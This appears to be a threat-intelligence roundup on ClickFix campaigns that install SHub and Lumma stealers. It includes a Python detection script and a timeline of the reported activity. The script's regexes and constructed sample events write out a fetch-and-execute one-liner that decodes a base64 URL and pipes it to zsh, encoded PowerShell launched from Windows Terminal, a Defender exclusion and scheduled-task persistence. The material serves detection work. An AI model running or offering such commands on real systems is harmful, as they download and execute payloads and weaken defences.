ClickFix Social Engineering Campaigns Using Terminal Commands to Install Stealers
Multiple reports highlighted ClickFix-style social engineering that convinces users to paste attacker-supplied commands into a terminal, leading to infostealer installation. Malwarebytes documented a macOS lure impersonating CleanMyMac via cleanmymacos[.]org, where victims are instructed to run a Terminal command that prints a reassuring message, decodes a hidden (base64) destination, and then downloads and executes a remote shell script via zsh. The resulting payload installs SHub Stealer, which targets saved passwords, browser data, Apple Keychain contents, Telegram sessions, and cryptocurrency wallets; it can also tamper with wallet applications (e.g., Exodus, Atomic Wallet, Ledger Live) to enable later theft of recovery phrases.
Microsoft threat intelligence (as reported by The Hacker News) described a parallel Windows ClickFix campaign that shifts from the traditional Run-dialog paste to Windows Terminal (wt.exe) using the Win + X → I shortcut, exploiting the tool’s administrative legitimacy to reduce suspicion and evade detections tuned to Run-dialog abuse. In that chain, users paste a hex-encoded/XOR-compressed command that spawns additional Terminal/PowerShell stages to decode scripts, download a ZIP payload plus a legitimate-but-renamed 7-Zip binary, extract additional components, establish persistence via scheduled tasks, configure Microsoft Defender exclusions, and ultimately deploy Lumma Stealer (including use of QueueUserAPC() for injection).
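The summaries above describe a recognisable shape: a pasted one-liner that decodes a hidden destination, pipes fetched content into a shell, and (on Windows) spawns PowerShell from Windows Terminal before adding Defender exclusions and a scheduled task. The triage script below is an added example, not code from Malwarebytes, Microsoft or any of the cited reports. It scores process command lines against those building blocks and decodes long hex or base64 tokens so the hidden URL becomes visible to an analyst. Every sample event is constructed for the example (the host example.invalid is a reserved name), and none of the strings are indicators from the real campaigns.

```python
"""Triage shell / process command lines for ClickFix-style one-liners.

Added example for detection engineering. The sample events below are
constructed to mirror the building blocks described in the campaign
summaries (base64-decoded destination piped to zsh, Windows Terminal
spawning PowerShell, Defender exclusions, scheduled-task persistence).
They are not real indicators from the reports.
"""
import base64
import binascii
import re

# One regex per building block of the described chains.
INDICATORS = [
    ("base64_decode_to_shell",
     re.compile(r"base64\s+(?:-d|--decode|-D)\b.*\|\s*(?:zsh|bash|sh)\b")),
    ("remote_script_to_shell",
     re.compile(r"(?:curl|wget)\b[^|]*\|\s*(?:zsh|bash|sh)\b")),
    ("shell_runs_fetched_script",
     re.compile(r"(?:zsh|bash|sh)\s+-c\s+[\"']?\$\((?:curl|wget)\b")),
    ("wt_exe_spawns_shell",
     re.compile(r"\bwt(?:\.exe)?\b.*\b(?:powershell|pwsh|cmd)\b", re.I)),
    ("powershell_encoded_command",
     re.compile(r"powershell(?:\.exe)?\b.*\s-(?:e|enc|encodedcommand)\b", re.I)),
    ("defender_exclusion",
     re.compile(r"Add-MpPreference\b.*-Exclusion", re.I)),
    ("scheduled_task_create",
     re.compile(r"schtasks(?:\.exe)?\s+/create\b", re.I)),
]

# Long runs of base64/hex characters: the lures hide the download URL in these.
BLOB = re.compile(r"(?<![A-Za-z0-9+/=])([A-Za-z0-9+/]{20,}={0,2})(?![A-Za-z0-9+/=])")
HEX = re.compile(r"(?:[0-9A-Fa-f]{2})+")


def decode_hidden_strings(cmdline):
    """Return printable text recovered from hex or base64 blobs in cmdline."""
    found = []
    for m in BLOB.finditer(cmdline):
        tok = m.group(1)
        if HEX.fullmatch(tok):
            raw = bytes.fromhex(tok)
        else:
            try:
                raw = base64.b64decode(tok, validate=True)
            except (binascii.Error, ValueError):
                continue  # not well-formed base64; ignore the token
        try:
            text = raw.decode("utf-8")
        except UnicodeDecodeError:
            continue  # binary payload, not a hidden string
        if text.isprintable():
            found.append(text)
    return found


def triage(cmdline):
    """Return indicator names, decoded blobs and a verdict for one command line."""
    hits = [name for name, rx in INDICATORS if rx.search(cmdline)]
    decoded = decode_hidden_strings(cmdline)
    if any("://" in s for s in decoded):
        hits.append("hidden_url_in_encoded_blob")
    return {"cmdline": cmdline, "indicators": hits, "decoded": decoded,
            "suspicious": bool(hits)}


# Constructed sample events (not real IOCs); example.invalid is a reserved TLD.
SAMPLE_EVENTS = [
    # macOS lure shape: reassuring echo, base64 destination, fetched script run by zsh
    'echo "Verifying installation..."; u=$(echo aHR0cHM6Ly9leGFtcGxlLmludmFsaWQvaW5zdGFsbC5zaA== | base64 -d); curl -fsSL "$u" | zsh',
    # Windows Terminal launching an encoded PowerShell command
    "wt.exe powershell -nop -w hidden -enc SQBFAFgA",
    # Windows Terminal launching PowerShell with a hex-encoded next-stage URL
    "wt.exe powershell -nop -w hidden -c $h='68747470733a2f2f6578616d706c652e696e76616c69642f7374616765322e7a6970'",
    # defence-evasion and persistence stages
    "powershell Add-MpPreference -ExclusionPath C:\\Users\\Public\\svc",
    "schtasks /create /sc minute /mo 30 /tn Updater /tr C:\\Users\\Public\\svc\\run.cmd",
    # benign admin activity that must not alert
    "brew upgrade && brew cleanup",
    "git log --oneline -n 20",
]


def scan(events):
    """Return triage results for the events that look like ClickFix activity."""
    return [r for r in (triage(e) for e in events) if r["suspicious"]]


if __name__ == "__main__":
    for r in scan(SAMPLE_EVENTS):
        print(r["indicators"], r["decoded"])
        print("    ", r["cmdline"][:90])
```

Feed it process-creation telemetry (Sysmon event 1 or EDR command-line fields on Windows, Endpoint Security process events on macOS) rather than shell history, since the pasted command runs before the victim's history file is flushed. The decoder deliberately skips tokens that are not valid UTF-8 or not printable, so compressed or XOR-obfuscated stages like the ones Microsoft described will surface as an indicator hit without a decoded URL; those need the follow-on PowerShell stage to be inspected.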

How this story unfolded
Six events, listed from the most recent confirmed update back to the earliest known activity.
Moonlock reports recruiter-themed ClickFix targeting VC and fintech talent
By March 31, 2026, Moonlock Lab documented a ClickFix campaign targeting crypto, Web3, blockchain, VC, and fintech professionals through fake LinkedIn recruiter personas, Calendly links, and spoofed Zoom or Google Meet pages. The campaign used fake verification prompts to copy OS-specific Terminal commands that launched multi-stage payloads stealing credentials and crypto wallet data, with tradecraft overlaps noted with DPRK-linked UNC1069 and Contagious Interview activity.
SHub Stealer campaign adds wallet backdooring and LaunchAgent persistence
Analysis of the macOS campaign showed SHub stealing Keychain, browser, iCloud, Notes, Telegram, and wallet data, backdooring Electron-based cryptocurrency wallet apps to capture seed phrases and passwords, and persisting via a LaunchAgent masquerading as Google Keystone.
Researchers identify fake CleanMyMac site delivering SHub Stealer on macOS
By March 6, 2026, researchers reported that the fake site cleanmymacos[.]org was impersonating CleanMyMac and using a ClickFix-style Terminal command to install SHub Stealer on macOS systems.
Microsoft publicly discloses Terminal-based ClickFix and Lumma details
On March 6, 2026, Microsoft publicly revealed the Windows Terminal-focused ClickFix campaign, including a second infection path involving batch/VBS/MSBuild execution and possible EtherHiding through blockchain RPC endpoints, along with defensive guidance.
ClickFix campaign deploys Lumma Stealer via multi-stage Windows chain
In the observed February campaign, pasted Terminal commands decoded and launched multi-stage payloads that downloaded archives and tools, established persistence with scheduled tasks, altered Microsoft Defender exclusions, and ultimately deployed Lumma Stealer to steal browser credentials from Chrome and Edge.
Microsoft observes Windows Terminal ClickFix campaign in February 2026
Microsoft Threat Intelligence observed a widespread ClickFix social-engineering campaign in February 2026 that shifted from the Windows Run dialog to Windows Terminal, using fake CAPTCHA, verification, and troubleshooting lures to trick users into pasting malicious commands.
Sources
ClickFix Attacks Are Targeting VC and Fintech Talent with New Multi-Stage Loader Techniques (hackernoon.com)
Lumma Stealer-spreading ClickFix attack uncovered (scworld.com)
Fake CleanMyMac Site Uses ClickFix Trick to Install SHub Stealer on macOS (hackread.com)
New ClickFix Attack leverages Windows Terminal for Payload Execution (cybersecuritynews.com)
Microsoft warns of ClickFix campaign exploiting Windows Terminal for Lumma Stealer (securityaffairs.com)
Fake CleanMyMac site installs SHub Stealer and backdoors crypto wallets (malwarebytes.com)
Microsoft Reveals ClickFix Campaign Using Windows Terminal to Deploy Lumma Stealer (thehackernews.com)
Microsoft spots ClickFix scam spreading Lumma infostealer (go.theregister.com)


